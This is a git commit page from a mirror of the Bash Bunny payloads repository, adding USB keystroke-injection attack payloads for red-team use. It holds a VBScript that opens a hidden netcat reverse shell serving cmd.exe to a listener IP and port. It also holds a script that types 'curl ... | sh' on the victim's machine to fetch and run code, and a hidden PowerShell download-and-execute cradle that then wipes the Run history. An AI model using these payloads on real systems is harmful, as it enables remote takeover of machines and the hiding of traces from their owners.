weyne/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5darren/bashbunny-payloads.git synced 2025-10-29 16:58:12 +00:00
Code Issues Packages Projects Releases Wiki Activity

Cleanup: Sort payloads by category

Browse Source
This commit is contained in:
Sebastian Kinne
2017-04-10 13:29:17 +10:00
parent 288d90c60e
commit 85b1bc7aca
513 changed files with 2 additions and 361 deletions
Download Patch File Download Diff File Expand all files Collapse all files

162
payloads/library/execution/RAZ_VBScript/a.vbs Normal file
View File

@@ -0,0 +1,162 @@
Option Explicit
'==============================================================================
' Title: a.vbs
' Author: RalphyZ
' Version: 1.0
' Target: Windows 7+
'
' Description:
' This VBScript is used by a BashBunny payload to
' to create a netcat reverse shell. The netcat listener
' IP Address and Port are stored in separate files - so that
' Red Teams can quickly change information. The "IncrementPort"
' subroutine will increase the port number by 1 every time the
' script is called. This is so that you can start multiple
' listeners while doing a PenTest, and grab multiple reverse
' shells in one trip. Uncomment that if you want the auto-increment
'
' Note: You must put the netcat executable in the strReverseShellPath directory
'==============================================================================
' Declare Constants
Const ForReading = 1
Const ForWriting = 2
' Declare Global Variables
Dim strListenerPort, strNewListenerPort, strListenerIP
Dim objFSO, objFile, strCurrentDirectory
Dim strNetCatEXE, strReverseShellPath, strListnerPortFile, strListenerIPFile
' The netcat executable name
strNetCatEXE = "nc.exe"
' The folder location
strReverseShellPath = "\payloads\library\RAZ_ReverseShell\"
' The file containing the listener port
strListnerPortFile = "listener_port.txt"
' The file containing the listener ip address
strListenerIPFile = "listener_ip.txt"
' Create a File System Object
Set objFSO = CreateObject("Scripting.FileSystemObject")
strCurrentDirectory = FindCurrentDirectory()
' Read the Host IP Address (where the listener resides)
ReadHostIP
' Read the listener port
ReadPort
' Increment the listener port - for multiple shells
' Great for Red Teams
'IncrementPort
' Start NetCat Reverse Shell
StartNetCat
'==============================================================================
' Name: FindCurrentDirectory
' Arguments: None
' Return Value: None
' Description: Find the netcat executable
'==============================================================================
Function FindCurrentDirectory
Dim objDrives, d
' Set default return value
FindCurrentDirectory = ""
' Search all drives for the netcat exe
Set objDrives = objFSO.Drives
For Each d in objDrives
If (objFSO.FileExists(d + strReverseShellPath + strNetCatEXE)) Then
FindCurrentDirectory = d + strReverseShellPath
End if
Next
End Function
'==============================================================================
' Name: ReadHostIP
' Arguments: None
' Return Value: None
' Description: Read the listener IP
'==============================================================================
Sub ReadHostIP()
' Opens the file for reading
Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListenerIPFile , ForReading)
' Read the host IP
strListenerIP = objFile.ReadAll
' Close the file
objFile.Close
End Sub
'==============================================================================
' Name: ReadPort
' Arguments: None
' Return Value: None
' Description: Read the listener port
'==============================================================================
Sub ReadPort()
' Opens the file for reading
Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListnerPortFile , ForReading)
' Read the listener port
strListenerPort = objFile.ReadAll
' Close the file
objFile.Close
End Sub
'==============================================================================
' Name: IncrementPort
' Arguments: None
' Return Value: None
' Description: Read the listener port, increment the counter by 1, and write
' the new value
'==============================================================================
Sub IncrementPort()
' Increment the listener port
strNewListenerPort = strListenerPort + 1
' Open the file that contains the listener port for writing
Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListnerPortFile , ForWriting)
' Write the new (incremented) port
objFile.WriteLine strNewListenerPort
' Close the file
objFile.Close
End Sub
'==============================================================================
' Name: StartNetCat
' Arguments: None
' Return Value: None
' Description: Start netcat on the appropriate port
'==============================================================================
Sub StartNetCat()
Dim strNetCat, strCommand, objShell
' Build the path to the netcat executable
strNetCat = objFSO.BuildPath(strCurrentDirectory, strNetCatEXE)
' Create the command string to run netcat on the correct ip and port,
' and serve cmd.exe to the listener
strCommand = strNetCat + " -nv " + strListenerIP + " " + strListenerPort + " -e cmd.exe"
' Create the WScript Shell object
Set objShell = WScript.CreateObject ("WScript.Shell")
' Run the command (' , 0'= hidden)
objShell.run strCommand, 0
' Free the object from memory
Set objShell = Nothing
End Sub

1
payloads/library/execution/RAZ_VBScript/listener_ip.txt Normal file
View File

@@ -0,0 +1 @@
192.168.1.100

1
payloads/library/execution/RAZ_VBScript/listener_port.txt Normal file
View File

@@ -0,0 +1 @@
4444

35
payloads/library/execution/RAZ_VBScript/payload.txt Normal file
View File

@@ -0,0 +1,35 @@
#!/bin/bash
#
# Title: RAZ_VBScript
# Author: RalphyZ
# Version: 1.0
# Target: Windows 7+
# Dependencies: VBScript (a.vbs) in the switch folder with this file
#
# Description: Executes a VBScript, concealed in a hidden PowerShell window
#
# Colors:
# Green.....................Working
# White.....................Completed without error
# Light-Blue (blinking).....a.vbs was not found
LED G
ATTACKMODE HID STORAGE
# Get the switch position
source bunny_helpers.sh
# Check if a.vbs is present
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then
LED B G 100
exit 1
fi
# Run the VBScript
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs')"
QUACK ENTER
# Green LED for finished
LED R G B

6
payloads/library/execution/ShellExec/evil.sh Normal file
View File

@@ -0,0 +1,6 @@
!#/bin/bash
# opens browsers to the bunny's index.html page
[[ "$(uname)" == "Darwin" ]] && open http://172.16.64.1
[[ "$(uname)" == "Linux" ]] && xdg-open http://172.16.64.1

1
payloads/library/execution/ShellExec/hook.js Normal file
View File

@@ -0,0 +1 @@
alert('This is where your evil JavaScript file would go')

12
payloads/library/execution/ShellExec/index.html Normal file
View File

@@ -0,0 +1,12 @@
<html>
<head>
<script type="text/javascript" src="http://172.16.64.1/hook.js"></script>
</head>
<body>
Nothing to see here!
</body>
</html>

54
payloads/library/execution/ShellExec/payload.txt Normal file
View File

@@ -0,0 +1,54 @@
#!/bin/bash
# Title: ShellExec
# Author: audibleblink
# Target: Mac/Linux
# Version: 1.0
#
# Create a web server on the BashBunny and forces
# the victim download and execute a script.
#
# White | Ready
# Ammber blinking | Waiting for server
# Blue blinking | Attacking
# Green | Finished
LED R G B
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
source bunny_helpers.sh
payload_dir=/root/udisk/payloads/$SWITCH_POSITION
log_file=$payload_dir/shellexec.log
cd $payload_dir
# starting server
LED R G 500
# disallow outgoing dns requests so server starts immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
# attack commences
LED B 500
Q GUI SPACE
Q DELAY 300
Q STRING terminal
Q DELAY 100
Q ENTER
Q DELAY 2000
# Q ALT F2 # swap with block above for linux
# Q DELAY 100
Q STRING curl "http://$HOST_IP/evil.sh" \| sh
# in case curl isn't installed
# Q STRING wget -O - "http://$HOST_IP/evil.sh" \| sh
Q ENTER
LED G

34
payloads/library/execution/ShellExec/readme.md Normal file
View File

@@ -0,0 +1,34 @@
# ShellExec
Author: audibleblink
Version: 1.0
## Description
Serves malicious scripts or web pages from the Bunny and forces
victims to curl and execute those scripts. Scripts can also force
browsers to open a url on the bunny to do things like serve BeEF
hooks.
## Configuration
evil.py - script that is fetched with DuckyScript
(provided script opens a web page that serves a BeEF hook )
hook.js - the aforementioned BeEF hook
index.html - BeEF hook delivery page
## Requirements
Just plug and play
## Status
| LED | Status |
| --------- | ----------- |
| White | Ready |
| Amber blinking | Waiting for server |
| Blue blinking | Attacking |
| Green | Finished |

69
payloads/library/execution/psh_DownloadExec/payload.txt Normal file
View File

@@ -0,0 +1,69 @@
#!/bin/bash
#
# Title: Powershell Download and Execute
# Author: LowValueTarget
# Version: 1.1
# Category: Powershell
# Target: Windows XP SP3+ (Powershell)
# Attackmodes: HID, RNDIS_ETHERNET
# Firmware: >= 1.1
#
# OPTIMIZED FOR BASHBUNNY 1.1_x+
#
# Quick HID attack to retrieve and run powershell payload from BashBunny web server - ensure psh.txt exists in payload directory
#
# | Attack Stage | Description |
# | ------------------- | ---------------------------------------- |
# | Stage 1 | Running Initial Powershell Commands |
# | Stage 2 | Turning up web server and DHCP |
# | Stage 3 | Delivering powershell payload |
#
LED SETUP
# Set working dir
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
cd $PAYLOAD_DIR
SERVER_LOG=server.log
# Fresh Server Log
rm -f $SERVER_LOG
# Disable ICMP/echo replies so our powershell stager doesn't attempt to access the SMB share before smbserver starts (workaround since Test-NetConnection 172.16.64.1 SMB only works on powershell 4.0+ for Windows 8+)
echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all
# Check for psh.txt
if [ ! -f $PAYLOAD_DIR/psh.txt ]; then
LED FAIL
exit 1
fi
# Attack HID
ATTACKMODE HID
LED STAGE1
# Attack
RUN WIN "powershell -WindowStyle Hidden \"while (\$TRUE) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { iex (New-Object Net.WebClient).DownloadString('http://172.16.64.1/psh.txt'); (New-Object Net.WebClient).DownloadString('http://172.16.64.1/COMPLETE'); exit } }\""
# Wipe prints
RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue\""
# Attack Ethernet
LED STAGE2
ATTACKMODE RNDIS_ETHERNET
# Start web server
iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately
python -m SimpleHTTPServer 80 > $SERVER_LOG 2>&1 &
# wait until python web server is listening
while ! nc -z localhost 80; do sleep 0.2; done
# Re-enable ICMP/echo replies to trip the powershell stager
echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all
LED STAGE3
while ! grep -Fq "GET /COMPLETE" $SERVER_LOG; do
sleep .5
done
LED FINISH

1
payloads/library/execution/psh_DownloadExec/psh.txt Normal file
View File

@@ -0,0 +1 @@
powershell "New-Item $ENV:UserProfile\Desktop\psh_downloadexec_test.txt -ItemType file"

26
payloads/library/execution/psh_DownloadExec/readme.md Normal file
View File

@@ -0,0 +1,26 @@
# psh_DownloadExec
## Powershell Download and Execute
* Author: LowValueTarget
* Version: Version 1.1
* Target: Windows XP SP3+ (Powershell)
* Category: Powershell
* Attackmodes: HID, RNDIS_Ethernet
* Firmware: >= 1.1
## Description
Quick HID attack to retrieve and run powershell payload from BashBunny web server.
## Configuration
Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
## STATUS
```
| Attack Stage | Description |
| ------------------- | ---------------------------------------- |
| Stage 1 | Running Initial Powershell Commands |
| Stage 2 | Turning up web server and DHCP |
| Stage 3 | Delivering powershell payload |
```